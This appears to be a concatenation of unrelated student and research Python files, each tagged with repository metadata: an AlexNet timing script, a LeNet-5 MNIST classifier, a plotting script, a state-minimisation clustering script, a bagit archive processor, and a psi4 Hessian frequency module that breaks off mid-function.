kernel1 = tf.Variable(tf.truncated_normal([11, 11, 3, 64], mean=0, stddev=0.1, dtype=tf.float32), name="weights")
conv = tf.nn.conv2d(images, kernel1, [1, 4, 4, 1], padding="SAME")
biases = tf.Variable(tf.constant(0, shape=[64], dtype=tf.float32), trainable=True, name="biases")
bias = tf.nn.bias_add(conv, biases)
conv1 = tf.nn.relu(bias, name=scope)
print_tensor_info(conv1)
parameters += [kernel1, biases]
lrn1 = tf.nn.lrn(conv1, 4, bias=1, alpha=1e-3 / 9, beta=0.75, name="lrn1")
pool1 = tf.nn.max_pool(lrn1, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding="VALID", name="pool1")
print_tensor_info(pool1)
with tf.name_scope("conv2") as scope:
kernel2 = tf.Variable(tf.truncated_normal([5, 5, 64, 192], dtype=tf.float32, stddev=0.1)
, name="weights")
conv = tf.nn.conv2d(pool1, kernel2, [1, 1, 1, 1], padding="SAME")
biases = tf.Variable(tf.constant(0, dtype=tf.float32, shape=[192])
, trainable=True, name="biases")
bias = tf.nn.bias_add(conv, biases)
conv2 = tf.nn.relu(bias, name=scope)
print_tensor_info(conv2)
parameters += [kernel2, biases]
lrn2 = tf.nn.lrn(conv2, 4, 1.0, alpha=1e-3 / 9, beta=0.75, name="lrn2")
pool2 = tf.nn.max_pool(lrn2, [1, 3, 3, 1], [1, 2, 2, 1], padding="VALID", name="pool2")
print_tensor_info(pool2)
with tf.name_scope("conv3") as scope:
kernel3 = tf.Variable(tf.truncated_normal([3, 3, 192, 384], dtype=tf.float32, stddev=0.1)
, name="weights")
conv = tf.nn.conv2d(pool2, kernel3, strides=[1, 1, 1, 1], padding="SAME")
biases = tf.Variable(tf.constant(0.0, shape=[384], dtype=tf.float32), trainable=True, name="biases")
bias = tf.nn.bias_add(conv, biases)
conv3 = tf.nn.relu(bias, name=scope)
parameters += [kernel3, biases]
print_tensor_info(conv3)
with tf.name_scope("conv4") as scope:
kernel4 = tf.Variable(tf.truncated_normal([3, 3, 384, 256], stddev=0.1, dtype=tf.float32),
name="weights")
conv = tf.nn.conv2d(conv3, kernel4, strides=[1, 1, 1, 1], padding="SAME")
biases = tf.Variable(tf.constant(0.0, dtype=tf.float32, shape=[256]), trainable=True, name="biases")
bias = tf.nn.bias_add(conv, biases)
conv4 = tf.nn.relu(bias, name=scope)
parameters += [kernel4, biases]
print_tensor_info(conv4)
with tf.name_scope("conv5") as scope:
kernel5 = tf.Variable(tf.truncated_normal([3, 3, 256, 256], stddev=0.1, dtype=tf.float32),
name="weights")
conv = tf.nn.conv2d(conv4, kernel5, strides=[1, 1, 1, 1], padding="SAME")
biases = tf.Variable(tf.constant(0.0, dtype=tf.float32, shape=[256]), name="biases")
bias = tf.nn.bias_add(conv, biases)
conv5 = tf.nn.relu(bias)
parameters += [kernel5, bias]
pool5 = tf.nn.max_pool(conv5, [1, 3, 3, 1], [1, 2, 2, 1], padding="VALID", name="pool5")
print_tensor_info(pool5)
pool5 = tf.reshape(pool5, (-1, 6 * 6 * 256))
weight6 = tf.Variable(tf.truncated_normal([6 * 6 * 256, 4096], stddev=0.1, dtype=tf.float32),
name="weight6")
ful_bias1 = tf.Variable(tf.constant(0.0, dtype=tf.float32, shape=[4096]), name="ful_bias1")
ful_con1 = tf.nn.relu(tf.add(tf.matmul(pool5, weight6), ful_bias1))
weight7 = tf.Variable(tf.truncated_normal([4096, 4096], stddev=0.1, dtype=tf.float32),
name="weight7")
ful_bias2 = tf.Variable(tf.constant(0.0, dtype=tf.float32, shape=[4096]), name="ful_bias2")
ful_con2 = tf.nn.relu(tf.add(tf.matmul(ful_con1, weight7), ful_bias2))
weight8 = tf.Variable(tf.truncated_normal([4096, 1000], stddev=0.1, dtype=tf.float32),
name="weight8")
ful_bias3 = tf.Variable(tf.constant(0.0, dtype=tf.float32, shape=[1000]), name="ful_bias3")
ful_con3 = tf.nn.relu(tf.add(tf.matmul(ful_con2, weight8), ful_bias3))
weight9 = tf.Variable(tf.truncated_normal([1000, 10], stddev=0.1), dtype=tf.float32, name="weight9")
bias9 = tf.Variable(tf.constant(0.0, shape=[10]), dtype=tf.float32, name="bias9")
output_softmax = tf.nn.softmax(tf.matmul(ful_con3, weight9) + bias9)
return output_softmax, parameters
if __name__ == "__main__":
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
image_size = 224
images = tf.Variable(tf.random_normal([batch_size, image_size, image_size, 3]))
output, parameters = inference(images)
init = tf.global_variables_initializer()
sess = tf.Session()
sess.run(init)
objective = tf.nn.l2_loss(output)
grad = tf.gradients(objective, parameters)
mg = meta_graph.create_meta_graph_def(graph=sess.graph)
with open('alexnet_graph.json', "w") as f:
nodes = []
for n in sess.graph_def.node:
nodes.append("{\"name\":\"" + str(n.name) + "\",\"input\":\"" + str(n.input) + "\"}")
f.write("{\"nodes\":[\n")
f.write(",".join(nodes))
f.write("]}")
run_options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)
run_metadata = tf.RunMetadata()
time_st = time.time()
sess.run(grad, options=run_options, run_metadata=run_metadata)
time_ed = time.time()
with open('alexnet_runtime.json', 'w') as f:
f.write(str(time_ed - time_st))
tl = timeline.Timeline(run_metadata.step_stats)
ctf = tl.generate_chrome_trace_format()
with open('alexnet_timeline.json', 'w') as f:
f.write(ctf)
``` |
{
"source": "JohndeVostok/THU-Artificial-Intelligent",
"score": 3
} |
#### File: THU-Artificial-Intelligent/digit/lenet-5.py
```python
import math
import numpy as np
import torch
from torch import nn
from torch.nn import functional as F
from torch.utils.data import TensorDataset, DataLoader
from torchvision import transforms
BATCHSIZE = 256
kwargs = {'num_workers': 2, 'pin_memory': True} #DataLoader的参数
def initData():
with open("train.csv", "r") as f:
lines = f.readlines()
trainLabels = []
trainImages = []
for line in lines[1:]:
tmp = line.strip().split(",")
trainLabels.append(int(tmp[0]))
trainImages.append([int(x) for x in tmp[1:]])
testImages = []
with open("test.csv", "r") as f:
lines = f.readlines()
testImages = []
for line in lines[1:]:
tmp = line.strip().split(",")
testImages.append([int(x) for x in tmp])
return trainLabels, trainImages, testImages
class LeNet5(nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(1, 6, 5, padding=2)
self.conv2 = nn.Conv2d(6, 16, 5)
self.fc1 = nn.Linear(16*5*5, 120)
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, 10)
def forward(self, x):
x = F.max_pool2d(F.relu(self.conv1(x)), (2, 2))
x = F.max_pool2d(F.relu(self.conv2(x)), (2, 2))
x = x.view(-1, 400)
# print('size', x.size())
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return x
def initWeight(m):
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weigth.data.fill_(1)
m.bias.data.zero_()
def train(model, criterion, optimizer, trainLoader, epoch):
model.train()
for batch_idx, (data, target) in enumerate(trainLoader):
data, target = data.cuda(), target.cuda()
optimizer.zero_grad()
output = model(data)
loss = criterion(output, target)
loss.backward()
optimizer.step()
print('Train Epoch: {}\tLoss: {:.6f}'.format(epoch, loss.item()))
def valid(model, criterion, validLoader, epoch):
model.eval()
test_loss = 0
correct = 0
for data, target in validLoader:
data, target = data.cuda(), target.cuda()
with torch.no_grad():
output = model(data)
test_loss += criterion(output, target).item()
pred = output.data.max(1, keepdim=True)[1]
correct += pred.eq(target.data.view_as(pred)).cpu().sum()
test_loss /= len(validLoader.dataset)
print('\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.2f}%)\n'.format(
test_loss, correct, len(validLoader.dataset),
100. * correct / len(validLoader.dataset)))
def test(model, testLoader):
model.eval()
result = []
for data in testLoader:
data = data[0].cuda()
with torch.no_grad():
output = model(data)
pred = output.data.max(1, keepdim=True)[1]
for x in pred:
result.append(x.item())
id = 0
text = "ImageId,Label\n"
for x in result:
id += 1
text += str(id) + "," + str(x) + "\n"
with open("submit-cnn.csv", "w") as f:
f.write(text)
if __name__ == "__main__":
print(LeNet5())
dataLabels, dataImages, testImages = initData()
trainLabels = dataLabels[:40000]
trainImages = dataImages[:40000]
validLabels = dataLabels[40000:]
validImages = dataImages[40000:]
trainX = torch.from_numpy(np.array(trainImages).reshape(-1, 1, 28, 28)).float()
trainY = torch.from_numpy(np.array(trainLabels).astype(int))
validX = torch.from_numpy(np.array(validImages).reshape(-1, 1, 28, 28)).float()
validY = torch.from_numpy(np.array(validLabels).astype(int))
testX = torch.from_numpy(np.array(testImages).reshape(-1, 1, 28, 28)).float()
trainDataset = TensorDataset(trainX, trainY)
validDataset = TensorDataset(validX, validY)
testDataset = TensorDataset(testX)
trainLoader = DataLoader(dataset=trainDataset, shuffle=True, batch_size=BATCHSIZE, **kwargs)
validLoader = DataLoader(dataset=validDataset, shuffle=True, batch_size=BATCHSIZE, **kwargs)
testLoader = DataLoader(dataset=testDataset, shuffle=False, batch_size=BATCHSIZE, **kwargs)
model = LeNet5().cuda()
criterion = nn.CrossEntropyLoss(size_average=False)
optimizer = torch.optim.Adam(model.parameters(), lr=0.001, betas=(0.9, 0.99))
model.apply(initWeight)
for epoch in range(128):
train(model, criterion, optimizer, trainLoader, epoch)
valid(model, criterion, validLoader, epoch)
test(model, testLoader)
``` |
{
"source": "JohndeVostok/THU-Combinatorial-Mathematics",
"score": 3
} |
#### File: project/plt/plt_sp.py
```python
import math
import matplotlib.pyplot as plt
def load_data(data_path):
with open(data_path) as f:
lines = f.readlines()
data = []
for line in lines:
data.append(int(line.strip()))
return data
if __name__ == "__main__":
x = range(1, 13)
# theory = [1]
# for i in range(2, 13):
# theory.append(theory[-1] * i)
stl = load_data("data/stl_sp.txt")
rec = load_data("data/rec_sp.txt")
dic = load_data("data/dict_sp.txt")
sjt = load_data("data/sjt_sp.txt")
for i in range(12):
# theory[i] = math.log(theory[i], 2)
stl[i] = math.log(stl[i], 2)
rec[i] = math.log(rec[i], 2)
dic[i] = math.log(dic[i], 2)
sjt[i] = math.log(sjt[i], 2)
plt.xlabel("Payload")
plt.ylabel("Log Time (us)")
# plt.plot(x, theory)
plt.plot(x, sjt, label="SJT")
plt.plot(x, stl, label="STL")
plt.plot(x, rec, label="Recruit")
plt.plot(x, dic, label="Dictionary")
plt.legend()
plt.savefig("img/fig_sp.pdf")
plt.show()
``` |
{
"source": "JohndeVostok/THU-EDA-homework",
"score": 3
} |
#### File: THU-EDA-homework/homework3/cluster.py
```python
def compatible(a, b):
if len(a) != len(b):
return False
n = len(a)
for i in range(n):
if a[i] != -1 and b[i] != -1 and a[i] != b[i]:
return False
return True
def partition(comp):
n = len(comp)
rest = range(n)
res = [-1 for i in range(n)]
t = 0
while len(rest) > 0:
flag = 1
for i in rest:
for j in rest:
if not comp[i][j]:
nodes = [i, j]
flag = 0
break
if not flag:
break
if flag:
for i in rest:
res[i] = t
t += 1
break
for i in rest:
flag = 1
for node in nodes:
if comp[i][j]:
flag = 0
break
if flag:
nodes.append(i)
s = [[i] for i in nodes]
restt = []
for i in rest:
for idx, group in enumerate(s):
flag = 1
for node in group:
if not comp[i][node]:
flag = 0
break
if flag:
res[i] = t + idx
if group[0] != i:
group.append(i)
break
if res[i] == -1:
restt.append(i)
t += len(s)
rest = restt
return res
if __name__ == "__main__":
with open("test2.in", "r") as f:
lines = f.readlines()
data = [[int(term) for term in line.strip().split()] for line in lines]
n, m = data[0]
next, output = [], []
for i in range(1, n + 1):
next.append(data[i][0:m])
output.append(data[i][m:])
comp = [[1 for i in range(n)] for i in range(n)]
flag = 0
for i in range(n):
for j in range(n):
if not compatible(output[i], output[j]):
flag = 1
comp[i][j] = 0
while flag:
flag = 0
for i in range(n):
for j in range(n):
if comp[i][j]:
for k in range(m):
if next[i][k] != -1 and next[j][k] != -1 and not comp[next[i][k]][next[j][k]]:
flag = 1
comp[i][j] = 0
break
res = partition(comp)
str = " ".join([str(term) for term in res])
with open("test2.out", "w") as f:
f.write(str)
``` |
{
"source": "johndewees/bag_manipulation",
"score": 2
} |
#### File: johndewees/bag_manipulation/bagit_script.py
```python
import re
import os
import shutil
from bdbag import bdbag_api
from bagit import BagValidationError
from bdbag.bdbagit import BaggingInterruptedError
def extract_bags():
num_bags = 0
for file in os.listdir(path = 'bags_zip'):
#converts a zipped bag into a bag
bdbag_api.extract_bag('bags_zip/' + file, output_path = 'bags_extract', temp=False)
num_bags += 1
print('* Bag Extraction Complete *')
print('* Extracted {0} bags *'.format(str(num_bags)))
def validate_bags():
error_log_handle = open('validation_error_log.txt', 'a')
filevar = 'TECHMD.xml'
num_bags = 0
for directory in os.listdir(path = 'bags_extract'):
#attempts to validate bags and logs any problem directories that raised errors
try:
bdbag_api.validate_bag('bags_extract/' + directory, fast = False)
except BagValidationError:
error_log_handle.write('Bag Validation Error | Directory: ' + directory + '\n')
except BaggingInterruptedError:
error_log_handle.write('Bagging Interruped Error | Directory: ' + directory + '\n')
except RuntimeError:
error_log_handle.write('Runtime Error | Directory: ' + directory + '\n')
subdir = os.listdir(path = 'bags_extract/' + directory + '/data')
if filevar not in subdir:
error_log_handle.write('TECHMD.xml File Not Found Error | Directory: ' + directory + '\n')
shutil.rmtree('bags_extract/' + directory)
num_bags += 1
print('* Bag Validation Complete *')
print('* Validated {0} bags *'.format(str(num_bags)))
error_log_handle.close()
def process_bags():
num_bags = 0
error_log_str = ''
error_log_handle = open('validation_error_log.txt', 'r')
error_log = error_log_handle.read()
for line in error_log:
error_log_str = error_log_str + line
for directory in os.listdir(path = 'bags_extract'):
#skips any directories that raised errors during validation
if error_log_str.find(directory) != -1 :
continue
else:
#converts the bags back into normal directories, removing bagit and manifest files
bdbag_api.revert_bag('bags_extract/' + directory)
#removes unnecessary files generated by Islandora
unneccesary_files = ['foo.xml', 'foxml.xml', 'JP2.jp2', 'JPG.jpg', 'POLICY.xml', 'RELS-EXT.rdf', 'RELS-INT.rdf', 'TN.jpg', 'HOCR.html', 'OCR.txt', 'MP4.mp4', 'PROXY_MP3.mp3']
for file in os.listdir(path = 'bags_extract/' + directory):
if file in unneccesary_files:
os.remove('bags_extract/' + directory + '/' +file)
#use regex to identify originally uploaded file name
xml = open('bags_extract/' + directory + '/TECHMD.xml')
fn_lst = []
for line in xml:
result = re.findall('>(.+\.OBJ\..+)<', line)
fn_lst = fn_lst + result
orig_file_name = fn_lst[0]
if orig_file_name.startswith('/'):
orig_file_name = orig_file_name[5:]
orig_file_name = orig_file_name.split('.')
orig_file_name = orig_file_name[0] + '.' + orig_file_name[2]
obj_file_name = ''
for file in os.listdir(path = 'bags_extract/' + directory):
if re.search('^OBJ', file):
obj_file_name = file
#rename the OBJ file to original filename pulled from TECHMD.xml
os.rename('bags_extract/' + directory + '/' + obj_file_name,'bags_extract/' + directory + '/' + orig_file_name)
num_bags += 1
error_log_handle.close()
print('* Bag Processing Complete *')
print('* Processed {0} bags *'.format(str(num_bags)))
def create_bags():
num_bags = 0
for directory in os.listdir(path = 'bags_extract'):
#creates new well formed bag for Preservica SIP
bdbag_api.make_bag('bags_extract/' + directory, algs = ['sha256'], metadata = {
'Source-Organization' : 'University of Rochester',
'Contact-Name' : '<NAME>',
'Contact-Email' : '<EMAIL>'})
#zips the bag to prepare for ingest into Preservica
bdbag_api.archive_bag('bags_extract/' + directory, bag_archiver = 'zip')
shutil.move('bags_extract/' + directory + '.zip', 'bags_upload/' + directory + '.zip')
print('-- Created: {0}.zip'.format(directory))
num_bags += 1
print('* Bag Creation Complete *')
print('* Created {0} bags *'.format(str(num_bags)))
print('* Check error log for problem assets *')
extract_bags()
validate_bags()
process_bags()
create_bags()
``` |
{
"source": "johndhead/build_num_cartormwt_hessian",
"score": 3
} |
#### File: johndhead/build_num_cartormwt_hessian/hess_freq.py
```python
import psi4
import numpy as np
import sys
import scipy.linalg
import scipy.stats
def ck_print(*args,turn_on=False):
""" function ck_print(*args,turn_on=False)
selectively reduces the number of prints
set turn_on = True to check project of trans and rot modes
working correctly
"""
if turn_on:
print(*args)
# routine to print out the numpy hess matrix
def print_hess(hess,title="numpy hess matrix",simple_int=False,prnt=False):
""" print out lower symmetrical part of the hess matrix
hess is the hessian - numpy darray
simple_int = False for decimals - set to True if identity matrix
"""
hess_size = hess.shape[0]
numat = hess_size//3
psi4.core.print_out("\n%s -- num atoms = %d" % (title,numat))
if not prnt:
return
else:
if simple_int:
print(hess)
return
row = 0
for iat in range(numat):
psi4.core.print_out("\nAtom row %d" % iat)
col = 0
for jat in range(0,iat+1,2):
rstr = [str("%2d" % (row)),str("%2d"% (row+1)),str("%2d"% (row+2))]
for jjat in range(2):
if jat +jjat > iat:
continue
else:
for add_at in range(3):
rstr[add_at] += str(" %2d %10.3e %10.3e %10.3e" % (jat+jjat,hess[row+add_at,col],hess[row+add_at,col+1],hess[row+add_at,col+2]))
col += 3
if jat +jjat == iat:
row += 3
psi4.core.print_out("\n%s" % rstr[0])
psi4.core.print_out("\n%s" % rstr[1])
psi4.core.print_out("\n%s" % rstr[2])
psi4.core.print_out("\n-------------------------------------------------------------------------")
#row += 3
return
def prnt_vib_evec(evec,freq,mass):
""" routine to write the vibrational evec
Parameter
---------
evec: ndarray (3*nat,3*nat)
freq: ndarray (3*nat) (in 1/cm)
mass: list
Returnu
------
None
"""
#mm=np.array(mass)
nmodes=len(freq)
nat = len(mass)
if nmodes//3 != nat:
psi4.core.print_out("\nERROR: nmodes = %d and should = 3*nat, nat = %d" % (nmodes,nat))
return "Error with nat and nmodes"
# setup print labels
psi4.core.print_out("\n\n=========== Vibrational normal modes ============\n")
psi4.core.print_out("\n dvec = orthog mass wt cvec = cartesian disps")
#print("type(mass) = ",type(mass))
#vec = " 1234567 1234567 1234567 1234567"
Dvec = " dx dy dz Td "
Cvec = " cx cy cz Tc "
for im in range(nmodes):
avec = evec[:,im].reshape(nat,3)
Td = np.sum(avec**2,axis=1)
Totd = np.sum(Td)
Tc = Td/np.sqrt(mass)
Totc = np.sum(Tc)
mTc = mass*Tc
Tot_mtc = np.sum(mTc)
psi4.core.print_out("\n imode = %d freq = %9.4f" % (im,freq[im]))
psi4.core.print_out("\natom "+Dvec+Cvec+" m * Tc")
for iat in range(nat):
ic = 3 * iat
D = " %7.3f %7.3f %7.3f %7.3f " % (evec[ic,im],evec[ic+1,im],
evec[ic+2,im],Td[iat])
sm = 1./np.sqrt(mass[iat])
C = " %7.3f %7.3f %7.3f %7.3f " % (sm*evec[ic,im],sm*evec[ic+1,im],
sm*evec[ic+2,im],Tc[iat])
psi4.core.print_out("\n%3d %s %s %7.3f" % (iat,D,C,mTc[iat]))
psi4.core.print_out("\n Totals: TotD = %7.3f TotC = %7.3f Tot_mtc = %7.3f"
% (Totd, Totc, Tot_mtc))
return
def pseudo_invert_hess(freq, evec, ntran=3, nrot=3, teval= 0., reval = 0., detscl=1., inv_hess = False):
"""
Forming psuedo inverse hess matrix from the freq (evals) and evec of the starting projected mwt hess matrix
parameter
---------
freq: 1D ndarray
initial hess eigenvalues in wavenumbers (1/cm) - trans and rot vectors assumed to be listed first in hess evec
hess: ndarray
initial hess eigenvecs
ntran: int
no of translations modes (3)
nrot: int
no of rotational modes (3 or 2)
teval, reval: float
values to set the trans and rot modes eigenvalues in inverse
det_scl:
mass wt factors for "utmwt" or "atmwt" vib modes -- set to det_scl value for initial matrix
inv_hess: bool
True if init hess is an inverse matrix, False if a direct hess
Returns
-------
inverted_mat: ndarray
shape (3*numat,3*numat)
"""
# unit conversion
hartree2waveno = 219474.6
ck_print("hartree2waveno = %f" % hartree2waveno)
au2amu = 5.4857990907e-04 # CODATA recommend value 2019 = 5.485 799 090 65(16) e-04 ?? corrected 8-may-2020
#sqrt_au2amu = np.sqrt(au2amu/mass_unit) # convert amu from g to kg
sqrt_au2amu = np.sqrt(au2amu/1000.) # convert amu from g to kg
#Evib = hbar * omega = hbar * sqrt(k/m)
if inv_hess:
radpsec2waveno = 1./(hartree2waveno*sqrt_au2amu)
else: # unit conversion for mass weighted hessian
radpsec2waveno = hartree2waveno*sqrt_au2amu
ck_print("au2amu %f inv(au2amu) %f -- radpsec2waveno %f" % (au2amu,1./au2amu,radpsec2waveno))
# set up freq values
psi4.core.print_out("\n=== init freq values in 1/cm ->\n",freq)
freq_shft = 100. # freq shift in 1/cm
if teval > -3*freq_shft or reval > -3.*freq_shft:
teval = 0.
reval = 0.
freq_shft = 0.
psi4.core.print_out("\ninitial trans %f and rot %f 1/cm freq values -- freq_shft = %f" % (teval,reval,freq_shft))
for itran in range(ntran):
freq[itran] = teval + freq_shft*itran
for irot in range(nrot):
freq[ntran+irot] = reval + freq_shft* irot
psi4.core.print_out("\n=== shifted freq values in 1/cm ->\n",freq)
#set up mass_unit
mass_unit = 1000./detscl
# now convert freq in wavenumbers to freq1 in au
# freq1 corresponds to eigenvals of mwt hessian being inverted
# freq2 = 1/freq1 and is the eigenvalues of inverted hessian
# trans/rot frequencies of inverted matrix set to the teval and reval values given function args
scale = np.ones_like(freq)/radpsec2waveno
scale = scale**2
scale[freq<0] = -scale[freq<0]
freq1 = freq**2 * scale / mass_unit # convert freq in wavenumbers to eval of mass wt hessian
psi4.core.print_out("\nmass_unit = %f scale = \n" % mass_unit,scale,"\n freq1 -->\n",freq1)
#for ivec in range(mat_dim):
# psi4.core.print_out("\nivec %d scale[ivec] = %12.5e freq2[ivec] = %12.5e 1/freq2[ivec] = %12.5e"
# % (ivec,scale[ivec],freq2[ivec],1./freq2[ivec]))
if inv_hess:
# in freq calc
#freq = 1./(scale *np.sqrt(freq2))
# freq2 for inv_hess
#freq2 = 1./(scale * freq * mass_unit)
# freq 2 for direct hess = inverted inv hess
freq2 = freq1.copy()
# try inverting
# 1st effort
freq2[ntran+nrot:] = 1./freq1[ntran+nrot:]
# 2nd effort
#freq2[ntran+nrot:] = freq1[ntran+nrot:]
psi4.core.print_out("\nEigenvalues in au for direct mwt hess from inverted mwt hess")
# invert trans + rot if abs(freq1[0:6]) > 1.e-5
for imode in range(ntran+nrot):
if np.abs(freq1[imode]) > 1.e-5:
freq2[imode] = 1./freq1[imode]
psi4.core.print_out("\ninverting freq1[%d] = %15.7f --> %15.7f" % (imode,freq1[imode],freq2[imode]))
else:
psi4.core.print_out("\nnot inverting freq1[%d] = %15.7f to %15.7f freq2[^%d] = %15.7f"
% (imode,freq1[imode],1./freq1[imode],imode,freq2[imode]))
############################### here sat
else: # scale factor of direct mass_wted
# freq2 for direct hess
#freq2 = scale * freq * mass_unit
# freq 2 for inverted mwt hess = inverted direct hess
freq2 = freq1.copy()
# trying inverting
# 1st effort
#freq1[ntran+nrot:] = 1./freq2[ntran+nrot:]
# freq2 is the eval of the inverted matrx
# invert trans + rot if abs(freq1[0:6]) > 1.e-5
###for imode in range(ntran+nrot):
###if np.abs(freq1[imode]) > 1.e-5:
###freq2[imode] = 1./freq1[imode]
###print("inverting freq1[%d] = %15.7f --> %15.7f" % (imode,freq1[imode],freq2[imode]))
###else:
###print("not inverting freq1[%d] = %15.7f to %15.7f freq2[^%d] = %15.7f"
###% (imode,freq1[imode],1./freq1[imode],imode,freq2[imode]))
###freq2[ntran+nrot:] = 1./freq1[ntran+nrot:]
# 2nd effort
#freq1[ntran+nrot:] = freq2[ntran+nrot:]
psi4.core.print_out("\nEigenvalues in au for inverted direct mwt hess")
# invert trans + rot if abs(freq1[0:6]) > 1.e-5
for imode in range(ntran+nrot):
if np.abs(freq1[imode]) > 1.e-5:
freq2[imode] = 1./freq1[imode]
psi4.core.print_out("\ninverting freq1[%d] = %15.7f --> %15.7f" % (imode,freq1[imode],freq2[imode]))
else:
psi4.core.print_out("\nnot inverting freq1[%d] = %15.7f to %15.7f freq2[^%d] = %15.7f"
% (imode,freq1[imode],1./freq1[imode],imode,freq2[imode]))
freq2[ntran+nrot:] = 1./freq1[ntran+nrot:]
inverted_mat = np.zeros_like(evec,dtype=float)
for imode in range(len(freq)):
psi4.core.print_out("\n%3d inv_freq = %16.7f 1/inv_freq = %16.7f orig freq = %12.3f 1/cm"
% (imode,freq2[imode],freq1[imode],freq[imode]))
inverted_mat += freq2[imode] * np.outer(evec[:,imode],evec[:,imode])
if inv_hess:
psi4.core.print_out("\n=============== finished inverting the inverse mwt hessian =================")
else:
psi4.core.print_out("\n=============== finished inverting the direct mwt hessian =================")
return inverted_mat,not inv_hess
# scale energy hess or invhess with masses before calling freq_calc
def mwt_ehess(mol_name,ehess,mass,mass_type="atmwt",mass_detscl=1.,inv_hess=False):
""" funtion to set up mwt hess or invhess from energy ehess or einvhess
parameters
----------
mol_name: string
ehess: ndarray
contains hess to be mass weighted
mass: ndarry
atom masses - shape (3,3*natom)
where jj: (jj=0) mass**1 (jj=1) mass**1/2 (jj=2) mass**(-1/2))
mass_type: str
Either "atmwt" (traditional) or "utmwt" (unitary)
mass_detscl: float
determinant scaling factor for masses "atmwt" = 1. "utmwt" = mass_detscl
inv_hess: bool
True if starting hess direct, False is init hess inverse - not mass wtd
return
-------
mwt_hess: ndarry
mwt_hess = ehess[i,j]*(mass[jj,iat]*mass[jj,jat])
"""
# initially set mwt_hess as a copy of routine input ehess
mwt_hess = ehess.copy()
numat = mwt_hess.shape[0]//3
psi4.core.print_out("\n\n================ Start of forming mass weighted hessian =============")
psi4.core.print_out("\n=== mass_type = %s mass_detscl = %10.5f inv_hess = %s\n" % (mass_type,mass_detscl,inv_hess))
psi4.core.print_out("\n==== mass.shape = %s" % str(mass.shape))
if mass_type == "atmwt":
psi4.core.print_out("\ntraditional freq calc on molecule %s with molar mass %.7f"
% (mol_name,np.sum(mass[0])/3.))
elif mass_type == "utmwt":
scaled_m = mass.copy()
psi4.core.print_out("\nunitary freq calc on molecule %s unit molecular wt %.7f and detscl %15.6f"
% (mol_name,np.sum(mass[0])/3.,mass_detscl))
else:
psi4.core.print_out("\nERROR in mwt_ehess - mass_type = %s which is not an allowed option")
return 1000
if inv_hess:
# scaled_m = mass ** half
scaled_m = mass[1]
psi4.core.print_out("\nForming mass weighted inv_hess")
else:
# hess scaled by mass ** -half
scaled_m = mass[2]
psi4.core.print_out("\nForming mass weighted hess")
for i in range(3*numat):
mwt_hess[i,:] *= scaled_m[:]
for j in range(3*numat):
mwt_hess[:,j] *= scaled_m[:]
return mwt_hess
def freq_calc(hess,detscl=1.,ref_freq=None,long_freq_out=False,inv_hess=False):
""" calc vibrational frequencies from the mass weighted hessian matrix hess
and compare the calc frequencies with ref_freq computed by other hessian calc
mass_unit gives the scale so that the atomic masses are kg/mol units = 1000. typically
detscl = geometric mean of atomic masses
inv_hess=True when hess is a mass_wted inv_hess form in scl_einvhess"""
psi4.core.print_out("\n======== Start of computing vibrational freq from mass weighted hess ========")
psi4.core.print_out("\n============== Trace of hess in freq calc = %16.8e ============="
% np.trace(hess))
# unit conversion
hartree2waveno = 219474.6
ck_print("hartree2waveno = %f" % hartree2waveno)
au2amu = 5.4857990907e-04 # CODATA recommend value 2019 = 5.485 799 090 65(16) e-04 ?? corrected 8-may-2020
#sqrt_au2amu = np.sqrt(au2amu/mass_unit) # convert amu from g to kg
sqrt_au2amu = np.sqrt(au2amu/1000.) # convert amu from g to kg
#Evib = hbar * omega = hbar * sqrt(k/m)
if inv_hess:
radpsec2waveno = 1./(hartree2waveno*sqrt_au2amu)
else: # unit conversion for mass weighted hessian
radpsec2waveno = hartree2waveno*sqrt_au2amu
ck_print("au2amu %f inv(au2amu) %f -- radpsec2waveno %f"
% (au2amu,1./au2amu,radpsec2waveno))
#hartree2Hz = 6.579684e3
#Hz2waveno = hartree2Hz / hartree2waveno
#print("Hz2waveno = %f" % Hz2waveno)
#mat_dim = len(nwchem_freq)
mat_dim = hess.shape[0]
# symmetrize the hess matrix
# find eigenvalues and mass weighted evec from hess
freq3,evec= scipy.linalg.eigh(hess)
# scale the frequency by the mass_unit conversion factor
freq2 = freq3.copy()
scale = radpsec2waveno*np.ones_like(freq2)
scale[freq2<0] = -scale[freq2<0]
freq2[freq2<0] = -freq2[freq2<0]
# set up mass_unit
mass_unit = detscl / 1000.
psi4.core.print_out("\n\n mass_unit = detscl/1000. = %12.6f detscl = %12.6f" % (mass_unit,detscl))
#for ivec in range(mat_dim):
# psi4.core.print_out("\nivec %d scale[ivec] = %12.5e freq2[ivec] = %12.5e 1/freq2[ivec] = %12.5e"
# % (ivec,scale[ivec],freq2[ivec],1./freq2[ivec]))
if inv_hess:
# comment out mass scaling to see if mass_unit giving a problem
freq2 *= mass_unit # need to check this works
freq = 1./(scale *np.sqrt(freq2))
psi4.core.print_out("\ninv_test -- freq = 1/(scale*np.sqrt(freq2)) ->\n,",freq2)
#junk psi4.core.print_out("\ninv_test2 -- freq/mass_unit**2 -->",mass_unit/scale*np.sqrt(freq2))
psi4.core.print_out("\n\n Frequency (1/cm) from inverse hess + mat 1/evals (au)")
# reverse order of inv_hess eigenvals starting with ivec value when freq2[ivec] > 1.e-5
for ivec in range(mat_dim):
if np.abs(freq2[ivec]) < 1.e-5:
psi4.core.print_out("\nabs(freq2[%d]) < 1.e-5 -- freq2 = %9.5e freq[%d] set to zero"
% (ivec,freq2[ivec],ivec))
freq[ivec]=0.
#print("=== Not doing eval,evec flip flipiv = %d" % flipiv)
#order freq in increasing order
fr_ord = np.argsort(freq)
tmp_fr = freq[fr_ord[:]]
freq= tmp_fr.copy()
tmp_fr=freq3[fr_ord[:]]
freq3 = tmp_fr.copy()
tmp_vec = evec[:,fr_ord[:]]
evec = tmp_vec.copy()
del tmp_fr
del tmp_vec
del fr_ord
else: # scale factor of direct mass_wted
# comment out mass scaling to see if mass_unit giving a problem
freq2 /= mass_unit
